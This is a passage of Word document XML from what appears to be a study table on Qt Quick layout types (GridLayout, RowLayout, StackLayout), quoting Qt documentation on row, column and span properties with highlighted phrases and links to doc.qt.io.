              <w:t> property is specified, it will be treated as a maximum limit of how many columns the layout can have, before the auto-positioning wraps back to the beginning of the next row. The </w:t>
            </w:r>
            <w:hyperlink r:id="rId1759" w:anchor="columns-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>columns</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> property is only used</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> when </w:t>
            </w:r>
            <w:hyperlink r:id="rId1760" w:anchor="flow" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>flow</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> is GridLayout.LeftToRight.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C66270" w:rsidRPr="00763692" w:rsidRDefault="00C66270" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The </w:t>
            </w:r>
            <w:hyperlink r:id="rId1761" w:anchor="rows-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>rows</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> property works in a similar way, but items are auto-positioned vertically. The </w:t>
            </w:r>
            <w:hyperlink r:id="rId1762" w:anchor="rows-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>rows</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> property is only used when </w:t>
            </w:r>
            <w:hyperlink r:id="rId1763" w:anchor="flow" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>flow</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> is GridLayout.TopToBottom.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C66270" w:rsidRPr="00763692" w:rsidRDefault="00C66270" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">You can specify </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>which cell you want an item to occupy</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> by setting the</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1764" w:anchor="row-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.row</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1765" w:anchor="column-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.column</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> properties. You can also specify the row span or column span by setting the</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1766" w:anchor="rowSpan-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="FF0000"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.rowSpan</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1767" w:anchor="columnSpan-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="FF0000"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.columnSpan</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>properties</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C66270" w:rsidRPr="00763692" w:rsidRDefault="00C66270" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Items in a </w:t>
            </w:r>
            <w:hyperlink r:id="rId1768" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GridLayout</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> support these attached properties:</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> …</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A40BC4" w:rsidRPr="002230B8" w:rsidTr="00763692">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A1485C" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>RowLayout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2235" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00490E7E" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1769" w:history="1">
              <w:r w:rsidR="00A1485C" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http://doc.qt.io/qt-5/qml-qtquick-layouts-rowlayout.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00A1485C" w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00A1485C" w:rsidRPr="00763692" w:rsidRDefault="00A1485C" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">It is available </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>as a convenience for developers, as it offers a cleaner API</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A1485C" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Items in a RowLayout support these attached properties:…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A40BC4" w:rsidRPr="002230B8" w:rsidTr="00763692">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00B415D4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>StackLayout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2235" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00490E7E" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1770" w:history="1">
              <w:r w:rsidR="00B415D4" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http://doc.qt.io/qt-5/qml-qtquick-layouts-stacklayout.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B415D4" w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00863ED4" w:rsidRPr="00763692" w:rsidRDefault="00863ED4" w:rsidP="00763692">
            <w:pPr>
              <w:spacing w:after="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>The </w:t>
            </w:r>
            <w:hyperlink r:id="rId1771" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
                </w:rPr>
                <w:t>StackLayout</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> class </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>provides a stack of items where only one item is visible at a time</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00863ED4" w:rsidRPr="00763692" w:rsidRDefault="00863ED4" w:rsidP="00763692">
            <w:pPr>
              <w:spacing w:after="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>current visible item</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> can be modified by setting the </w:t>
            </w:r>
            <w:hyperlink r:id="rId1772" w:anchor="currentIndex-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
                </w:rPr>
                <w:t>currentIndex</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t> property. The index corresponds to the order of the </w:t>
            </w:r>
            <w:hyperlink r:id="rId1773" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
                </w:rPr>
                <w:t>StackLayout</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>'s children.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00863ED4" w:rsidRPr="00763692" w:rsidRDefault="00863ED4" w:rsidP="00763692">
            <w:pPr>
              <w:spacing w:after="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>In contrast</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
